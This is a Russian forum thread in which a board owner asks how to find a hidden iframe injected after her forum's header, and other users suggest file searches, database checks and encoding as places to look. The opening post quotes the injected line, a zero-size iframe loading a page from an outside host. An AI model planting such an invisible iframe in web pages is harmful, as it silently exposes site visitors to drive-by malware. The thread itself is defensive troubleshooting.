Перейти к контенту
  • 0

Троян Backdoor на форуме

ElenaI

Вопрос

Странная ситуация - вылавливают его не все юзеры, меньшинство, но сам факт меня озадачил. Прошлась по файлам - никаких изменений с апреля, а вирусные предупреждения начались в августе. Попросила очень занятого программиста хоть глазком одним посмотреть, что за чертовщина. Он "глянул рендерный текст" и вот чего узрел прямо после хедера:

<!-- / End board header -->

<iframe src="http://icqspl.jino-net.ru/index.php" width="0" height="0"></iframe>

Вопрос такой - ГДЕ искать эту строку? в каких файлах? Голову сломала уже :D

Версия форума 2.2.2, лицензионная

• Ответы 60
  • Создана
  • Последний ответ

Лучшие авторы в этом вопросе

Лучшие авторы в этом вопросе

Загружено фотографий

Рекомендуемые сообщения

• 0
Админка->Изменить HTML шаблоны->skin_global->global_board_header

• 0
Админка->Изменить HTML шаблоны->skin_global->global_board_header

Я же написала, что встраивается эта строка ПОСЛЕ хедера, т. е. после во этой строки: <!-- / End board header -->

Но естественно, указанный Вами файл я несколько раз просмотрела еще до того как тут задать вопрос. :D

• 0
обычно меняют индексный файл (index.php)... как вариант можно конечно слить на локальный диск папку skin_cache(если конечно там это прописано) и сделать поиск с заданной строкой по файлам (например при помощи Total Commander) Изменено пользователем Nonamers

• 0

Такие вещи ищются элементарно:

1) Скачай в инете Text Replacer, прога бесплатна и элементарна в управлении.

2) Просканируй этой программой все файлы форума (можно даже бекап БД сканить) на предмет наличия выше упомянутой строки.

3) И будет тебе счастье :D

• 0
Не-а, там такой строки не будет скорее всего. Скорее всего это не в файлах скина, а просто document.write во многих файлах :D

• 0
обычно меняют индексный файл (index.php)... как вариант можно конечно слить на локальный диск папку skin_cache(если конечно там это прописано) и сделать поиск с заданной строкой по файлам (например при помощи Total Commander)

В папке skin_cache последние изменения делались в феврале и апреле. Так что, там этого точно нет.

• 0
Злоумышленник смог записать туда что-то, хзначит вполне возможно мог и дату сменить.

• 0
Не-а, там такой строки не будет скорее всего. Скорее всего это не в файлах скина, а просто document.write во многих файлах :D

А можно подробнее об этом? Дело в том, что файлы форума не менялись уже несклько месяцев, а троян появился только 2 недели назад.

Вот интересно, поможет ли апгрейт форума до версии 2.3.1., или лучше сначала решить проблему на этой версии?

• 0

Если был получен доступ к FTP, то можно записать туда скрипт, кторый подправит в нужную сорону дату редактирования, если хостинг позволяет.

Может помочь, может не помочь.

В любом случае стоит скачать себе все файлы и поискать document.write и icqspl.jino-net.ru там.

• 0
В первую очередь на index.php посмотреть. Когда-то у меня была похожая фигня, вирус не тронул ничего, кроме index.php

• 0
В первую очередь на index.php посмотреть. Когда-то у меня была похожая фигня, вирус не тронул ничего, кроме index.php

На index.php все чисто, эт я в первую очередь проверила.

Такие вещи ищются элементарно:

1) Скачай в инете Text Replacer, прога бесплатна и элементарна в управлении.

2) Просканируй этой программой все файлы форума (можно даже бекап БД сканить) на предмет наличия выше упомянутой строки.

А можно для дилетантов ссылку на бесплатный Text Replacer, который сканит и php файлы в том числе. Я нашла только платный Text Replacer :D

• 0
Возьми Arachonophilia 4.0: http://www.arachnoid.com/arachnophilia/index.html

Взяла, но не поняла, чем это может помочь в акетном поиске фрагмента текста? Для того, чтобы посмотреть каждый отдельный php, достаточно блокнота. Или есть какая-то опция?

• 0

Взяла, но не поняла, чем это может помочь в акетном поиске фрагмента текста? Для того, чтобы посмотреть каждый отдельный php, достаточно блокнота. Или есть какая-то опция?

В Total Commander по нажатию Alt-F7 есть возможность поиска текста по файлам с любыми расширениями. Просканируйте директорию форума со всеми файлами на содержание этой строки..

• 0

У меня таоке было. Неправда что менять нужно только в индексном файле. Менять нужно во всех файлах.

Строчку дописывают во все файлы в конце файла (даже в текстовых файлах и в тех было =( ).

• 0
А можно для дилетантов ссылку на бесплатный Text Replacer, который сканит и php файлы в том числе. Я нашла только платный Text Replacer

Специально для дилетантов:

качаем демку проги на оф. сайте

http://www.infortech.ru/prj/open/tr/

Демка от покупной версии отличается лишь тем, что она не сканирует вордовские файлы (у меня не разу в жизни сканировать эти файлы необходимости не возникало :D ), все остальные (html, htm, php, txt …) она прекрасно сканирует, не каких таймеров (типа 30 дней юзаешь, а потом прога блокируется) в демке нет, вобщем отличная вещь, всё на русском и управление элементарное.

Для дилетантов эта прога сложнавата.

• 0

Спасибо за прогу. Просканила все файлы форума. Строки с icqspl.jino-net.ru не нашла. Что ж теперь делать? :D Сканировать базу? Предупреждение о вирусе вываливается прямо на главной странице форума, то есть, оно не связано с сообщениями.

У меня таоке было. Неправда что менять нужно только в индексном файле. Менять нужно во всех файлах.

Строчку дописывают во все файлы в конце файла (даже в текстовых файлах и в тех было =( ).

а что именно у вас было? у моих знакомых дважды сайт компании, на движке Joomla, заразили вирусом, так я им сразу нашла, где "собака порылась" - там действительно все индексные файлы были с припиской вконце, и дата изменения файлов была четкая - как раз день взлома. А тут я прост голову сломала, где искать. Противно до жути и оправдываться перед юзерами уже неловко. ;)

• 0

Вопрос:

Спасибо за прогу. Просканила все файлы форума. Строки с icqspl.jino-net.ru не нашла. Что ж теперь делать? :D Сканировать базу? Предупреждение о вирусе вываливается прямо на главной странице форума, то есть, оно не связано с сообщениями.

Ответ:

Не-а, там такой строки не будет скорее всего. Скорее всего это не в файлах скина, а просто document.write во многих файлах :)

Вопрос:

у моих знакомых дважды сайт компании, на движке Joomla, заразили вирусом, так я им сразу нашла, где "собака порылась" - там действительно все индексные файлы были с припиской вконце, и дата изменения файлов была четкая - как раз день взлома. А тут я прост голову сломала, где искать. Противно до жути и оправдываться перед юзерами уже неловко. ;)

Ответ:

Сделайте бекап таблицы скинов(ibf_skin_templates) и поищите в нём ещё.

• 0
Вопрос:
Спасибо за прогу. Просканила все файлы форума. Строки с icqspl.jino-net.ru не нашла. Что ж теперь делать? :) Сканировать базу? Предупреждение о вирусе вываливается прямо на главной странице форума, то есть, оно не связано с сообщениями.

Ответ:

Не-а, там такой строки не будет скорее всего. Скорее всего это не в файлах скина, а просто document.write во многих файлах :)

На document.write я тоже все файлы просканировала, естественно (читать советы я умею :D ). Но нашлось сие только в 4 файлах, после чего я просканировала новый дистрибутив IPB 2.3.1 - там то же самое, в тех же файлах этот же document.write. Значит, не оно?

Базу данных сейчас гляну, спасибо.

Ответ:

Сделайте бекап таблицы скинов(ibf_skin_templates) и поищите в нём ещё.

Там тоже чисто, только что проверила.

Буду рада за любые идеи, ГДЕ искать эту троянску дрянь ;)

• 0
возможно, что сама эта строка закодирована в base_64 например или другим способом

• 0
возможно, что сама эта строка закодирована в base_64 например или другим способом

и как же её искать? :D

вообще, теоретически, где "собирается" вся страница - в каком файле? После шапки форума (после закрытия всех тегов шапки) сразу встраивается эта строка с вирусом, но где-то же - в каком-то файле - идет сборка всех включений?

• 0
не парьтесь, а :D жалко уже Вас ... дайте доступ к фтп какому-нибудь опытному человеку Изменено пользователем Nonamers

• 0
не парьтесь, а ;) жалко уже Вас ... дайте доступ к фтп какому-нибудь опытному человеку

Вообще, раньше мне во всех этих вопросах помогал очень опытный человек, причем, не бесплатно, но он уже 2 месяца не выходит а связь, поэтому приходится разбираться самой :) Проблема в том, что если ты - владелец сайта, то в итоге лучше самому начать во всем разбираться, чем зависеть от других людей, у которых сегодня есть настроение что-то сделать, а на завтра - нет. Даже за деньги - все то же самое... Пэтому и прошу :D Может, кто хоть не даром, но поможет? Вот адрес форума.

• 0

Nonamers бесплатно предлагает. И я присоединяюсь.

P.S. Возьмите с хостинга ./sources/classes/class_display.php, заархивируйте и выложите, он за вывод отвечает.

• 0
можете ничего не выкладывать, а просто постучаться ко мне в аську (она в профиле) :D

Присоединиться к обсуждению

Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.

Гость
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Ответить на вопрос...

×   Вы вставили отформатированный текст.   Удалить форматирование

Допустимо не более 75 смайлов.

×   Ваша ссылка была автоматически заменена на медиа-контент.   Отображать как ссылку

×   Ваши публикации восстановлены.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

Зарузка...

• Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.